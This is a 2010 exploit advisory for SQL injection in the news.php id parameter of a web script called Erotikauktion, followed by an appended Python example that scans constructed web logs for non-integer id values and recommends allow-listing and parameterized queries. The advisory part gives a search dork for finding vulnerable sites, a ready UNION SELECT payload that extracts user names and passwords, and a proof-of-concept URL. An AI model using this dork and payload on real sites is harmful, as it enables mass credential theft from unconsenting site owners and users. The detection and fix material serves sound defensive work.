Erotikauktion (news.php id) SQL Injection Vulnerability
2010-05-10 19:37:55
Title : Erotikauktion ( news.php ) sql injection
Date : 10 May 2010
Author : Attack3r
Blog : a4security.blogspot.com
Site : www.1923Turk.Com
=======================================
dork : inurl:"/news.php?id="
Sql : -1+and+1=1+union+select+1,concat(name,0x3a,password,0x3a),3,4,5+from+users
p0c :
http://192.168.1.1/path/news.php?id=-1+and+1=1+union+select+1,concat(name,0x3a,password,0x3a),3,4,5+from+users
=======================================
gr33tz : HaCkSpY, CodeMaster.. And All Muslim Hackers ...
==========A=T=T=A=C=K=3=R==============
Fixes
No fixes
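Added detection example (not part of the original advisory or the product's code): the payload above places SQL text in the id parameter of news.php, where a news lookup should only ever receive a plain integer, so any non-integer id on that script is worth flagging in web server logs. The log lines, client addresses and the function name below are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format), for illustration only.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2010:19:40:01 +0000] "GET /path/news.php?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/May/2010:19:41:13 +0000] "GET /path/news.php?id=-1+and+1=1'
    '+union+select+1,concat(name,0x3a,password,0x3a),3,4,5+from+users HTTP/1.1" 200 812',
    '203.0.113.9 - - [10/May/2010:19:41:20 +0000] "GET /path/index.php?id=7 HTTP/1.1" 200 900',
    '198.51.100.4 - - [10/May/2010:19:42:02 +0000] "GET /path/news.php?id=7%20UNION%20SELECT%201 HTTP/1.1" 200 640',
]

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_news_requests(lines):
    """Return (client_ip, decoded id) for news.php requests whose id is not a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/news.php"):
            continue  # only the script named in the advisory
        # parse_qs URL-decodes values, so '+' and '%20' both become spaces.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_news_requests(SAMPLE_LOG):
        print(f"{ip}\tnon-integer id: {value!r}")
```

The same allow-list rule (id must match [0-9]+) applied inside news.php before the query is built, together with a parameterized query, closes the hole rather than only detecting it.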

